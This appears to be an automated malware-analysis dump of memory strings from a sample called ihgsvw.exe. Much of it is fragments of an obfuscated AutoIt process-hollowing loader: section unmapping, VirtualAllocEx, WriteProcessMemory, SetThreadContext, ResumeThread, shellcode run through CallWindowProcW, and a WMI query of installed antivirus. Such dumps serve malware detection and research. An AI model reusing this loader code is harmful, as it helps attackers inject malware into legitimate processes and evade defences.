Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sssssseplacee838/////ay
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execquery\localhost\ro
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sexemodule61ef5a7537d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtualallocex
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: asmrylen
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iswow64process
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword_ptrde0fe3ac427d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bufferasmetptr
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binbufferetptrac427d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreatea7537d6
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71deeb255419xi
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernel32.dll0xn
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtualallocex7xg
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword_ptr.x|
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_decryptdatad ad\xj
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountincsxc
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountecjx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_fixreloc adax
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountdecxx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: displayname
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_derivekeydx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %localappdata%\tempsk
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~14 ad
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64w64
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea2beba94941
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %localappdata%\temp\k
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majoroperatingsystemver
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majorlinkerversionr<gj
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: addressofnewexeheader3gc
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de1ec28a69*gx
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: extendedregisters!gq
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofsectionsaderxgv
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pointertosymboltable_go
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofoptionalheader
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: flagsvg
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segfsig
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seggsbg
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segds
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: edi@x
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: esi@_p
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: edxh~
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ecx3a
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seges
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eflags
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segss
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segcs
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @_0fo
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: magic
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: spareh
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bool*
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mutantx
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tructsetdata($_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29, "imagebase", $_y0x3856f9de14e2ba5f487d3ca88dd6)%
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da03e8ac4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327c
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0aaea34518865a6654b
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)9y
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c71deeb25541 = dllstructgetsize($_y0x3856f9da0ae6bc5141)qy
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)ey
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)iy<
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msctfime ui
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9de0ae6bc5141 = dllstructgetptr($_y0x3856f9da0ae6bc5141)=x
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: createobject("wscript.shell").run "c:\users\user~1\appdata\local\temp\folder~1\ihgsvw.exe c:\users\user~1\appdata\local\temp\folder~1\ccmbpo~1.doc"
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword po
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: oihgsvw.exe
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: der10_51
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ryoihgsvw.exeder10_51
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user\temp\wfccrina.ini~e;h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion?a
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)ca
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif.n
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifzn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifpn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifin
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifon8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifbn;
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endiffn_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 2
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nextk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wend-m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncym
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif_m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncrm
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncpm)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)!
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ssssss = "..."
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $owmi = objget("winmgmts:\\localhost\root\securitycenter2")
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe1cc89e6f4a411499bfda1b69b8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespaceataddressu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c80ff2bc5f51660df0cdd6p\b8;u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6!u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c\u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da3df3a9426c6725af97e9387cwu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7cbu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eeab5f7c770ab29ce2277c}u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7chu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e61ed880714b5a068fa3ca0ecu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e61ed880714b5a0387b5d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f4d411094b2ca0e7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f59570699c8bd6f7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f4974479613eab97fd307c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0ei
